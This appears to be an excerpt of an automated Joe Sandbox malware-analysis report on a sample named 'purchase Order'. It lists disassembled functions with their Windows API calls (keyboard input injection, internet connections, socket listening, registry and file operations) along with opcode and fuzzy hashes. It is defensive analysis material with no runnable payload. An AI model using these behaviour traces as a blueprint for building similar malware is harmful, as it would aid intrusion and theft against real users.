GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CA3BFB

Strings

RegDeleteKeyExW, xrefs: 00CA3BF5
advapi32.dll, xrefs: 00CA3BE4

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 601eae609dd4f1aec5466f4e9762f12576de1ae4c5ffb58744da0681e93c243d
Instruction ID: aade47fd18921e3f141175fce5d63a59c4b99cd81fa37fc6317c15b46bd7b489
Opcode Fuzzy Hash: 601eae609dd4f1aec5466f4e9762f12576de1ae4c5ffb58744da0681e93c243d
Instruction Fuzzy Hash: 99D0A7704007579FC7245F60EC09B5BBAF4AB0333CB144439F456E2150D6B4C5808E10

Function 00C79B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2448d6b03dd295e34e90ea3d3be8e8674bcfd4d09f6d9aff58005d3d1de2a49c
Instruction ID: 0d63722aa55a000b613c02000ea39c68facd78934c83371cb2cc10c7fd93421a
Opcode Fuzzy Hash: 2448d6b03dd295e34e90ea3d3be8e8674bcfd4d09f6d9aff58005d3d1de2a49c
Instruction Fuzzy Hash: 24C12C75A0021AEFDF15DF94C884EAEB7B5FF48710F108598E91AAB251D730EE81DB90

Function 00C9AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C9AAB4
CoUninitialize.OLE32 ref: 00C9AABF

Part of subcall function 00C80213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C8027B

VariantInit.OLEAUT32(?), ref: 00C9AACA
VariantClear.OLEAUT32(?), ref: 00C9AD9D

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: ede318c982574fd852d04eff3217c76fb864c5ea19105f83865d576dd7b38371
Instruction ID: 58768c1422f1e9e10cbec752998150caaef2fb9927e31dfd2f01489b7b0c51bc
Opcode Fuzzy Hash: ede318c982574fd852d04eff3217c76fb864c5ea19105f83865d576dd7b38371
Instruction Fuzzy Hash: 25A138752047019FDB10EF14C499B1AB7E5FF89720F148459FA969B3A2CB30ED44DB86

Function 00C791CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C791DD
SysAllocString.OLEAUT32(?), ref: 00C79286
VariantCopy.OLEAUT32 ref: 00C792B5
VariantClear.OLEAUT32(?), ref: 00C792DC

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: a4758a321d5c0833c8fde6302bfbfd1fe8b8d32721d5eda4b80cc672d5437d70
Instruction ID: 4ee67be60fa617dd408a528523e8b2e0e64eb61c900813abe684824b6657fdea
Opcode Fuzzy Hash: a4758a321d5c0833c8fde6302bfbfd1fe8b8d32721d5eda4b80cc672d5437d70
Instruction Fuzzy Hash: 665192346047069BDB24AF6AD495B2EB3E9EF45314F20C81FE55FCB2E1DB7098809705

Function 00C6365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C636B7
_memcpy_s.LIBCMT ref: 00C63729
__filbuf.LIBCMT ref: 00C637AA
_memset.LIBCMT ref: 00C637EE

Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction ID: b6016a65c49b910e93b64e31faa069afd3528260d49d3e975d2c46b5096d0ea9
Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction Fuzzy Hash: 6351A1B4A00286ABDB348FA9C9C46AE7BB5BF40320F248729F835972D0D775DF519B50

Function 00C8390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C83966
SetKeyboardState.USER32(00000080,?,00000001), ref: 00C83982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00C839EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00C83A4D

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: ef6bc9cc2b50b22056673e12fc1503d0946a3e3aabc7fe43c33582d466e65224
Instruction ID: f917d3eca31f21eb83367b76365d3fbd88f8c6e57ebc965345047e0fd68eef32
Opcode Fuzzy Hash: ef6bc9cc2b50b22056673e12fc1503d0946a3e3aabc7fe43c33582d466e65224
Instruction Fuzzy Hash: 7A414A70A04288AEEF31AB65C809BFDBBB5AB45719F04115AF4D2522C1C7B48F84E76D

Function 00C8E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C8E742
GetLastError.KERNEL32(?,00000000), ref: 00C8E768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C8E78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C8E7B9

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: a9ff9f9b50bb9d6fc61eb03e55e668bf57c12dbff109246d8cb71e7a5e3f5d8d
Instruction ID: ab5d1cda9cdeb899e206427b212418029d58fafe270358a1845484e1d1027458
Opcode Fuzzy Hash: a9ff9f9b50bb9d6fc61eb03e55e668bf57c12dbff109246d8cb71e7a5e3f5d8d
Instruction Fuzzy Hash: 52413439200610DFCB21EF15C444A4EBBE5FF9A720B098498E946AB3B2CB70FD40DB95

Function 00CAD7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00CAD807
GetWindowRect.USER32(?,?), ref: 00CAD87D
PtInRect.USER32(?,?,00CAED5A), ref: 00CAD88D
MessageBeep.USER32(00000000), ref: 00CAD8FE

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 976761b14ba4df1402cb449ae1a16a24d3a6ca133d596178dbf7f5927e867893
Instruction ID: 64672cbdc88867ffcabbe1ac0726532180e869da00bf3a57769809a6868ade54
Opcode Fuzzy Hash: 976761b14ba4df1402cb449ae1a16a24d3a6ca133d596178dbf7f5927e867893
Instruction Fuzzy Hash: 3C41CE74A0020ADFCB11CF59D884BA97BF5FF4A319F1881A9E427CB6A0C735E941CB90

Function 00C83A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00C83AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00C83AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00C83B34
SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00C83B92

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 3313ee4f2ef7db2049b7b256215c64965839364be59f52c2469bdb9999e1bc6b
Instruction ID: 876f56a9694cd285565eb5107708db2813d35fcf092a0c13818a0caeddd414aa
Opcode Fuzzy Hash: 3313ee4f2ef7db2049b7b256215c64965839364be59f52c2469bdb9999e1bc6b
Instruction Fuzzy Hash: 253166B0A00288AFEF30BB64C819BFEBBA69B45718F04115AE492972D1C7748F45D76D

Function 00C74004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C74038
__isleadbyte_l.LIBCMT ref: 00C74066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00C74094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00C740CA

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 62c6995e69f2203f74d9fc7ef047dca32b697717ea891bc247075ce96e713377
Instruction ID: cc80b4d77faa0634e625d9767a74998d95b37944588aa76c9deb902067d8d2e9
Opcode Fuzzy Hash: 62c6995e69f2203f74d9fc7ef047dca32b697717ea891bc247075ce96e713377
Instruction Fuzzy Hash: 5331E131600216EFDB299F75C845BBA7BA9FF40310F19C429EA698B1A0E731D990DB90

Function 00CA7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00CA7CB9

Part of subcall function 00C85F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C85F6F
Part of subcall function 00C85F55: GetCurrentThreadId.KERNEL32 ref: 00C85F76
Part of subcall function 00C85F55: AttachThreadInput.USER32(00000000,?,00C8781F), ref: 00C85F7D

GetCaretPos.USER32(?), ref: 00CA7CCA
ClientToScreen.USER32(00000000,?), ref: 00CA7D03
GetForegroundWindow.USER32 ref: 00CA7D09

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: fb4af628f384df79e67d41d5840c5b418e0b3ed598fc4a0fcb749839d29aa7f7
Instruction ID: 78e02551c6bb8984e43a1e749ba4bed51e09952eb665b8438acf0e8c83011d0c
Opcode Fuzzy Hash: fb4af628f384df79e67d41d5840c5b418e0b3ed598fc4a0fcb749839d29aa7f7
Instruction Fuzzy Hash: C8314F76D00108AFDB00EFA9CC859EFFBF9EF55314B108066E815E3211DA309E45DBA4

Function 00CAF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F

GetCursorPos.USER32(?), ref: 00CAF211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00CBE4C0,?,?,?,?,?), ref: 00CAF226
GetCursorPos.USER32(?), ref: 00CAF270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00CBE4C0,?,?,?), ref: 00CAF2A6

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: a6bef09029ea55e1522cb23c2664a6260c63e08eb5350b2e86586c0c91399b30
Instruction ID: c37318d9c6a04378d8411b46ef7e86013512596bc1ceec42658a21aeb927465d
Opcode Fuzzy Hash: a6bef09029ea55e1522cb23c2664a6260c63e08eb5350b2e86586c0c91399b30
Instruction Fuzzy Hash: 4A217E39500118AFCB159FD4CC98FFE7BB9EB4A714F444169F909872A1D3319E52DB60

Function 00C9431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C94358

Part of subcall function 00C943E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C94401
Part of subcall function 00C943E2: InternetCloseHandle.WININET(00000000), ref: 00C9449E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: fb352de78a6b2d913ce0ae8950c54e5da80cea5dd3d3819feb5ba17fb628c8a5
Instruction ID: 00feea86be20b448d5dc9eaf8cdfd399c89993e4f55ddee50b8f1086ed007218
Opcode Fuzzy Hash: fb352de78a6b2d913ce0ae8950c54e5da80cea5dd3d3819feb5ba17fb628c8a5
Instruction Fuzzy Hash: 3721C335200605BFEF1A9F71DC08FBBB7A9FF44711F10401AFA1696660DB71D922A790

Function 00C98A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00C98AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00C98AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 00C98AFF
WSAGetLastError.WSOCK32(00000000), ref: 00C98B16

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: bb78c18dafa6207fb782ff04f2525f85aef0f1bd09dcdb88f2ba4769760f7380
Instruction ID: 0304f2d9d449fb8c0a9458a191d3a418085fac05f7a4e224a8157c6c6e73837d
Opcode Fuzzy Hash: bb78c18dafa6207fb782ff04f2525f85aef0f1bd09dcdb88f2ba4769760f7380
Instruction Fuzzy Hash: 01219671A001249FC7119F69CC85F9EBBECEF4A310F00416AF84AD7251DB749A458F94

Function 00CA8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00CA8AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CA8AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CA8ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CA8ADC

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 80ddff9f54e4ec7c9d10d81826598a7432938dbb00cfafdbefc13434c4aaa728
Instruction ID: 6894d34476b8e3bc3aaefee6a529492895d1517485bc4e3be5f1521b695d61fe
Opcode Fuzzy Hash: 80ddff9f54e4ec7c9d10d81826598a7432938dbb00cfafdbefc13434c4aaa728
Instruction Fuzzy Hash: 7E11D031205112AFE704AB18CC05FBE77A9BF86325F144519F927C72E2CBB0AD459794

Function 00C80AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C81E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C80ABB,?,?,?,00C8187A,00000000,000000EF,00000119,?,?), ref: 00C81E77
Part of subcall function 00C81E68: lstrcpyW.KERNEL32(00000000,?,?,00C80ABB,?,?,?,00C8187A,00000000,000000EF,00000119,?,?,00000000), ref: 00C81E9D
Part of subcall function 00C81E68: lstrcmpiW.KERNEL32(00000000,?,00C80ABB,?,?,?,00C8187A,00000000,000000EF,00000119,?,?), ref: 00C81ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C8187A,00000000,000000EF,00000119,?,?,00000000), ref: 00C80AD4
lstrcpyW.KERNEL32(00000000,?,?,00C8187A,00000000,000000EF,00000119,?,?,00000000), ref: 00C80AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,00C8187A,00000000,000000EF,00000119,?,?,00000000), ref: 00C80B2E

Strings

cdecl, xrefs: 00C80B25

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: d02ba181b20f371ce4bc4756a2c5829c149c95ff13eafe0f588b07b94ec31bf5
Instruction ID: 6617b2b47ae2667704f30979cbee98de73e517e2c08ca1c300fb8f809b30150a
Opcode Fuzzy Hash: d02ba181b20f371ce4bc4756a2c5829c149c95ff13eafe0f588b07b94ec31bf5
Instruction Fuzzy Hash: 0611D03A200305AFDB25AF64DC05E7E77A8FF45318F90406AE80ACB2A0EB719945D7A5

Function 00C72F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00C72FB5

Part of subcall function 00C6395C: __FF_MSGBANNER.LIBCMT ref: 00C63973
Part of subcall function 00C6395C: __NMSG_WRITE.LIBCMT ref: 00C6397A
Part of subcall function 00C6395C: RtlAllocateHeap.NTDLL(015C0000,00000000,00000001,00000001,00000000,?,?,00C5F507,?,0000000E), ref: 00C6399F

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 4a9497a895644c127f537d9b9a2d97e9401ea848b8f30bc1da962c45147a1932
Instruction ID: 77e467aa60a94a7c207045af2344d8c8a3e402f6826e889b14bb6c0246d8e84c
Opcode Fuzzy Hash: 4a9497a895644c127f537d9b9a2d97e9401ea848b8f30bc1da962c45147a1932
Instruction Fuzzy Hash: 3611CA32509251BBDB313FB4EC857693BA8AF04364F28C925F95DDA161DB35CA40BA90

Function 00C8058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C805AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C805C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C805DD
FreeLibrary.KERNEL32(?), ref: 00C80632

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
